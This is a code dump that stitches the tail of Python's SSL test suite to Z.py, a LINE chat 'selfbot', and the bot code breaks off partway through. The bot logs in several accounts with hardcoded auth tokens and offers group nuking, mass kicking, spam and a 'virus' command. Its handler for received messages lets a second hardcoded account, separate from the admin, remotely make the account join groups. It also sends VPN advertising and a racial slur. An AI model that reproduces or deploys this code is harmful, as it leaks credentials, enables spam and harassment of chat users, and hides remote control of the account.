self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# SIGNED_CERTFILE2 (CN 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Z.py
|
# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
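# Z.py is a Python 2 LINE "selfbot" built on the third-party LINETCR client:
# a primary account ('cl') plus five helper "kicker" accounts log in below
# with static auth tokens, and chat commands are dispatched in bot() further
# down.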
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EpBdvSxlTymGNl6poj9c.YLgVP2FFH7O3buLlL8m1xa.XxsypSrBhHFXkAG9v7AyeOHU+aJ8T8ySnUCVFQVaWG0')
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token='EpICAa08FTHPaoZ94cj7.MRMd87JLMY8NA0SCe7JEXW.mDUfry/amiGJ9zxh+yO6rEJXmdzJc3i/70hvIeGM2Ro')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EpICAa08FTHPaoZ94cj7.MRMd87JLMY8NA0SCe7JEXW.mDUfry/amiGJ9zxh+yO6rEJXmdzJc3i/70hvIeGM2Ro')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki5.loginResult()
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
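# Help menus sent back to the chat by the 'help' command; the bracketed words
# are the literal command triggers matched in bot() below.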
helpMessage =""". *.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
||=====คำสั่งทั่วไป=====||
➣ [Me @]➣ดูคอนแทคเพื่อน
➣ [Tr-th]➣แปลเป็นไทย
➣ [Tr-en]➣แปลเป็นอังกฤษ
➣ [Ginfo]➣ดูข้อมูลกลุ่ม
➣ [Glist]➣ส่งของขวัญ
➣ [Cancel]➣ยกเลิกเชิน
➣ [Invite]➣เชินตามคอนแทค
➣ [Invite: ]➣เชินด้วยเอมไอดี
➣ [Unban @]➣ เพิ่มบันชีขาว @
➣ [Unban:]➣ เพิ่มบันชีขาวmid
➣ [Unban on]➣ เพิ่มบันชีขาวcontact
➣ [Ban @ ]➣ เพิ่มบันชีดำ @
➣ [Ban:]➣ เพิ่มบันชีดำmid
➣ [Ban on ]➣ เพิ่มบันชีดำcontact
➣ [Clear ban]เชคแบนโชว์คอนแทค
➣ [Link on]☆เปิดลิ้ง
➣ [Link off]☆ปิดลิ้ง
➣ [Gurl]
➣ [Url ]➣ลิ้งกลุ่ม
➣ [Gname]
➣ [Banlist ]
➣ [Details grup]
➣ [on]➣ เปิดข้อความต้อนรับ
➣ [off]➣ ปิดข้อความต้อนรับ
➣ [Respon on]➣เปิดกล่างถึงคนแท้ค
➣ [Respon off]➣ปิดกล่าวถึงคนแท้ก
➣ [Inviteme:]
➣ [Info grup]
➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
➣ [Clear grup
➣️ [Reject]☆ลบรันตัวเอง
➣ [Mic:]☆เชคคอนแทค
➣️ [Reject1]➣ [ลบรันคิกเก้อ
➣ [Nuke]☆ล้างห้อง
➣ [Mention,Tagall]➣แทคทั้งห้อง
➣ [Kick @]➣ เตะ @
➣ [Kick::]➣ เตะmid
➣ [Bc:ct ]
➣ [Bc:grup]
➣ [Block @]
➣ [Youtube]➣ยูทูป
➣ [vdo]
➣ [Blocklist]
➣ [Spam on/off]➣รันข้อความแชท
➣ [ไวรัส01]
➣ [Bot:ct ]
➣ [Bot:grup.]
➣ [Allname:]
➣ [Allbio:]
➣ [Gc]☆ดูผู้สร้างห้อง
➣ [Speed]☆สปีดบอท
➣ [Conban]➣เชคแบน
➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
➣ [Copy1 @] ➣ ก้อปปี้คิกเก้อ1
➣ [Copy2 @] ➣ ก้อปปี้คิกเก้อ2
➣ [Copy3 @] ➣ ก้อปปี้คิกเก้อ3
➣ [Copy4 @] ➣ ก้อปปี้คิกเก้อ4
➣ [Copy5 @] ➣ ก้อปปีัคิกเก้อ4
➣ [Mybackup @ ]➣กลับคืนค���าก้อปปี้
➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
➣ [Getname @]➣เชคชื่อเพื่อน
➣ [Getbio @]➣เชคตัสเพื่อน
➣ [Getprofile @]➣เชคเสตัสเพื่อน
➣ [Jam on/off]➣
➣ [Jam say:]
➣ [Com on/off]
➣ [Message set:]
➣ [Comment set:]
➣ [Pesan add:]
||===== P R O T E C T =====||
➣ [Panick:on/off]
➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
➣ [Protect on]☆ป้องกันเปิด/ปิด
➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
➣[Staff add/remove @]
||======= FOR ADMIN =======||
*.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
Http://line.me/ti/p/~getk3333
*.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
||==============================================||
"""
help2Message ="""||=====kieline=====||
||✒️ คท - ส่งคท.ตัวเอง(Me)
||✒️ ไอดี - ส่งMidตัวเอง
||✒️ คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
||✒️ คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
||✒️ คิกออก - สั่งคิกเกอร์ออกกลุ่ม
||✒️ แทค - แทคสมาชิก
||✒️ จุด - ตั้งจุดเชคคนอ่าน
||✒️ อ่าน - เชครายชื่อคนอ่าน
||✒️ เชคกลุ่ม - เชคข้อมูลกลุ่ม
||✒️ ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
||✒️ ยกเชิญ,ยก - ยกเลิกเชิญ
||✒️ Mid @ - เชคMidรายบุคคล
||✒️ ดึง - เชิญคนเข้ากลุ่มด้วยคท.
||✒️ ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
||✒️ ขาว - แก้ดำ(ส่งคท.)
||✒️ ดำ - เพิ่มบัญชีดำ(ส่งคท.)
||✒️ เชคดำ - เชคบัญชีดำ
||✒️ ล้างดำ - ล้างบัญชีดำ
||✒️ เปิดลิ้ง
||✒️ ปิดลิ้ง
||✒️ ลิ้ง - เปิดและขอลิ้งกลุ่ม
||✒️ Gname: - เปลี่ยนชื่อกลุ่ม
||✒️ ลบรัน - ลบรันตัวเอง
||✒️ ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
||✒️ ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
||✒️ . - เชคสถานะลอคอิน
||✒️ Sp - เชคสปีด
||✒️ Bot sp - เชคสปีดคิกเกอร์
||✒️ Mycopy @ - กอพปี้โปรไฟล์
||✒️ Copy @ - คิกเกอร์1กอพปี้
||✒️ Mybackup - กลับร่างเดิม
||✒️ Backup - คิกเกอร์1กลับร่างเดิม
||✒️ Spam on/off - ส่งข้อความสแปม
||==============================||
✯★Creator By *.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
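# 'admsa'/'admin' hold the owner's mid; only messages from this account may
# run privileged commands such as Cancel, the protect toggles and staff
# management.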
admsa = "uca51afa767df87ba3705494b97c3355c"
admin = "uca51afa767df87ba3705494b97c3355c"
wait = {
'contact':True,
'detectMention':True,
'autoJoin':False,
'autoCancel':{"on":False,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"selt bot by=*:K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅*.:。 ✿*゚‘゚・✿.。.:* *.",
"lang":"JP",
"comment":"Auto Like By ",
"welmsg":"welcome to group",
"commentOn":False,
"likeOn":True,
"wc":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"Sambutan":False,
"tag":False,
"pesan":"☺อย่าแท้กบ่อยน่ะเดะจับเยสเรย☺",
"cNames":"",
"blacklist":{},
"group":False,
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
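# wait2 backs the read-point feature: 'readPoint' stores the message id set
# by the Point command, while 'readMember'/'ROM' accumulate who read past it.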
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
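# Snapshot the current profiles so the Mybackup/Backup commands can restore
# the original display name, status message and picture after a Mycopy/Copy.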
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    # True when 'string' equals any command preceded by a supported prefix.
    tex = ["+","@","/",">",";","^","%","$","サテラ:"]
    for texX in tex:
        for command in commands:
            if string == texX + command:
                return True
    return False
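# bot(op) is the long-polled operation dispatcher. The numeric op.type values
# handled below follow the LINE Talk protocol as exposed by LINETCR:
#   13 = invited to a group, 15 = member left, 17 = member joined,
#   19 = kicked, 22/24 = invited to a room chat, 25 = message sent,
#   26 = message received.
# Everything runs inside one try block, so a failing handler cannot kill the
# polling loop.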
def bot(op):
global LINETCRLogged
global ki
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
                    # op.param3 packs the invitee mids separated by '\x1e'
                    # (assumed record separator used by the LINE protocol).
                    Inviter = op.param3.replace("\x1e",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u32c317f3ca4cd1a086bf38b083583948":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = cl.getContact(msg.from_)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cName = contact.displayName
msg.text1 = "@"+cName+" "
msg.text1 = "@"+cName+" "
balas = ["💗แท้กบ่อยด๋วจับเยสรุย💗"]
balas = ["มีเชลบอทลบรัน พร้อมคิกเก้อ💟\nลบบินกลุ่ม ออโต้ไลค์ และอื่นๆอีกมากมาย\n🔒กันสมาชิกเปิดลิ้งห้อง\n🔒กันรัน\n🔒กันสมาชิกเชิญคนนอกเข้า\n🔒กันสมาชิกเปลี่ยนชื่อกลุ่ม\n🔒กันคนนอกเข้ามาลบคนในกลุ่ม\n👉และมีเชิพเวอร์vpn(เน็ต) มีทั้งรายเดือนและรายวัน👈\n👉สนใจติดต่อลิ้งด้านล่างเรยครับ👈\nโอนเข้าบัญชี💲เทานั้น\nสนใจ แอดมาคุยได้\nhttp://line.me/ti/p/~getk3333\nhttp://line.me/ti/p/~getk9999"]
ret_ = msg.text1 + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.sendImageWithURL(msg.to,image)
break
#if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['kickMention'] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Putra lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
#3 ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# summon(op.param1,[op.param2])
#3 mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
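        # op.type 17 (member joined): several independent greeters follow; the
        # 'Sambutan' flag sends the joiner's contact card, while the 'group'
        # flag sends a text welcome plus the joiner's avatar.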
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "MEMBER JOIN TO GROUP"
        # Room chats are left via the op.type 22/24 handlers above.
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["group"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1, "(ღ¸.✻´`✻.¸¸ღღ¸.✻´`✻.¸¸ღღ¸.✻´`✻.¸¸ღ\n\n╔════════♪•●♥●•♪════════╗\n\n 😊ยินดีต้อนรับ 😊 @" + cl.getContact(op.param2).displayName + " เข้าห้อง" + "👉" + str(ginfo.name) + "👈\n\nมีเชิพเวอร์vpnเช่าราคาถุก👇👇👇\n\nhttps://www.plang-vpn.online\n\n╚════════♪•●♥●•♪════════╝")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if wait['group'] == True:
if op.param2 in bot1:
return
cl.sendText(op.param1,"ไปสะล่ะ ไว้เจอกันใหม่น่ะ @ " + cl.getContact(op.param2).displayName + " ลาก่อน\n~(^з^)-♡\n\n😍ไปแต่ตัวอย่าลืมหัวใจไปด้วยน้า😍")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait['group'] == True:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "😊ยินดีต้อนรับ 😊 @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n😃เข้ามาแร้วอย่าดื้อน่ะหนู😄")
print "MEMBER HAS JOIN THE GROUP"
# ----------------- NOTIFED MEMBER JOIN GROUP
# if op.type == 17:
# if wait["group"] == True:
# if op.param2 in admin:
# return
# ginfo = cl.getGroup(op.param1)
# contact = cl.getContact(op.param2)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(op.param1,image)
# print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
if op.type == 25:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
                    jawaban = wait["pesan"]
contact = cl.getContact(msg.from_)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
cl.sendText(msg.to,jawaban)
print "ada orang tag"
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
